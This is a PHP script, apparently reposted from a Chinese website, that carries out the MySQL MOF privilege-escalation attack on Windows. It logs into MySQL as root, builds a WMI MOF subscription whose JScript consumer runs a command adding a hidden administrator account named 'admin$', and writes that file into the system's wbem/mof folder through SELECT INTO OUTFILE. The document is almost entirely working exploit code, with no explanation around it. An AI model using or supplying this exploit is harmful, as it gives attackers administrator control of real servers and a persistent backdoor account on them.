<?php
$mysql_server_name='localhost';
$mysql_username='root';
$mysql_password='';
$mysql_database='mysql';
$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password,$mysql_database);
$cmdshell="net user admin$ qwe!@#123qwe /add";
$payload = "#pragma namespace(\"\\\\\\\\.\\\\root\\\\subscription\")
instance of __EventFilter as \$EventFilter
{
EventNamespace = \"Root\\\\Cimv2\";
Name = \"filtP2\";
Query = \"Select * From __InstanceModificationEvent \"
\"Where TargetInstance Isa \\\"Win32_LocalTime\\\" \"
\"And TargetInstance.Second = 5\";
QueryLanguage = \"WQL\";
};
instance of ActiveScriptEventConsumer as \$Consumer
{
Name = \"consPCSV2\";
ScriptingEngine = \"JScript\";
ScriptText =
\"var WSH = new ActiveXObject(\\\"WScript.Shell\\\")\\nWSH.run(\\\"$cmdshell\\\")\";
};
instance of __FilterToConsumerBinding
{
Consumer = \$Consumer;
Filter = \$EventFilter;
};";
mysql_select_db($mysql_database,$conn);
$sql="select '$payload' into outfile 'c:/windows/system32/wbem/mof/nullevt.mof';";
$result=mysql_query($sql);
mysql_close($conn);
?>
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。